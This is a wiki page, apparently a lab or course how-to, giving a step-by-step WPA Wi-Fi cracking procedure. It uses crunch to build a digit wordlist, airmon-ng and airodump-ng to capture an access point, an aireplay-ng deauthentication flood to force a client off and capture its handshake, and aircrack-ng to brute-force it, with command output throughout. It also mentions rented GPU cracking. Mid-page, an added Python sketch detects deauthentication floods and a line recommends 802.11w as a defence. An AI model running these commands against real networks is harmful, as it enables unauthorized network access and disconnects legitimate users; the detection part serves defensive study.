WLAN Brute-Force Attack
Revision of 14 October 2020, 16:11, by Thomas.will (→killing the problem processes)
Procedure
- Generate a password list
- Find the interface
- Put the interface into monitor mode
- Kill interfering processes
- List the WLANs
- Capture the AP
- Wait for a client handshake (possibly force a disconnect)
- Start the brute force against the capture file
- Success
Generate the password list
- crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000
crunch: 19% completed generating output
crunch: 38% completed generating output
crunch: 58% completed generating output
crunch: 76% completed generating output
crunch: 95% completed generating output
crunch: 100% completed generating output
Stop interfering services
- systemctl stop avahi-daemon
- systemctl stop NetworkManager
List interfaces
- airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
- echo INT=wlan0 >> data
- source data
Monitor mode
- airmon-ng start $INT
Check
- airmon-ng check wlan1mon
No interfering processes found
- if something is still running
- systemctl stop avahi-daemon
- systemctl stop NetworkManager
Dump
We look for the BSSID of dd-wrt
- airodump-ng wlan1mon
Obtain the handshake
- BSSIDSTADION=44:74:6C:54:68:E8 # needed later
- BSSIDAP=00:18:F8:DA:F7:94
- CHANNEL=6
- airodump-ng --bssid $BSSIDAP -c $CHANNEL -w wlan.cap wlan1mon
Open a second window (sends deauthentication packets)
- BSSIDSTADION=44:74:6C:54:68:E8
- BSSIDAP=00:18:F8:DA:F7:94
- aireplay-ng -0 50 -a $BSSIDAP -c $BSSIDSTADION wlan1mon
11:02:39 Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel 6
11:02:39 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 4 ACKs]
11:02:40 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 6 ACKs]
11:02:40 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 8 ACKs]
11:02:41 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 7 ACKs]
11:02:44 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|43 ACKs]
11:02:49 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [36|68 ACKs]
11:02:55 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:03:00 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:03:05 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:10 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:15 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:21 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 4|65 ACKs]
11:03:26 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:32 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|61 ACKs]
11:03:37 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|65 ACKs]
11:03:42 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|63 ACKs]
11:03:47 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:52 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:57 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [26|67 ACKs]
11:04:02 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:04:07 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:04:12 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
until the client is kicked off
After the client reconnects, the handshake is captured
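A defender-side check for the deauthentication burst shown above, as an added example that is not part of the original page: it counts deauthentication frames per AP/client pair in a sliding window and reports the first time a pair crosses the threshold. The frame tuples, the second client MAC, the timings and the window and threshold values are constructed assumptions; the AP and station MAC addresses are the ones used on this page.

```python
from collections import defaultdict, deque

AP = "00:18:F8:DA:F7:94"      # AP BSSID from this page
STA = "44:74:6C:54:68:E8"     # station MAC from this page
OTHER = "AA:BB:CC:00:00:01"   # constructed second client


def build_sample():
    """Constructed observations: (seconds, frame_subtype, bssid, station)."""
    frames = [(1.0, "deauth", AP, OTHER)]  # one ordinary disconnect
    # Three bursts of 64 directed deauth frames, as in the output above.
    for burst_start in (10.0, 10.6, 11.2):
        for i in range(64):
            frames.append((burst_start + i * 0.008, "deauth", AP, STA))
    frames.append((12.0, "beacon", AP, "FF:FF:FF:FF:FF:FF"))
    return frames


def detect_deauth_floods(frames, window=5.0, threshold=20):
    """Return {(bssid, station): first_alert_time} for every pair that sees
    more than `threshold` deauth frames within `window` seconds."""
    recent = defaultdict(deque)   # per-pair timestamps inside the window
    alerts = {}
    for ts, subtype, bssid, station in sorted(frames):
        if subtype != "deauth":
            continue
        key = (bssid, station)
        q = recent[key]
        q.append(ts)
        # Drop timestamps that have fallen out of the sliding window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold and key not in alerts:
            alerts[key] = ts
    return alerts


if __name__ == "__main__":
    for (bssid, station), ts in detect_deauth_floods(build_sample()).items():
        print(f"deauth flood: AP {bssid} -> client {station} at t={ts:.2f}s")
```

Enabling 802.11w (Protected Management Frames) on the AP lets PMF-capable clients discard forged deauthentication frames, which removes the forced reconnect this step relies on.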
Handshake
HANDSHAKE=00:18:F8:DA:F7:94
Cracking
- aircrack-ng -w password.lst -b $BSSIDAP wlan.cap-01.cap
Cracking speeds
A laptop manages roughly 1000 keys per second
A powerful graphics card (Titan XP) manages 520000 hash/s
If needed, computing power can also be rented online
https://www.gpuhash.me/?menu=en-tasks
or you can build a cluster out of several graphics cards



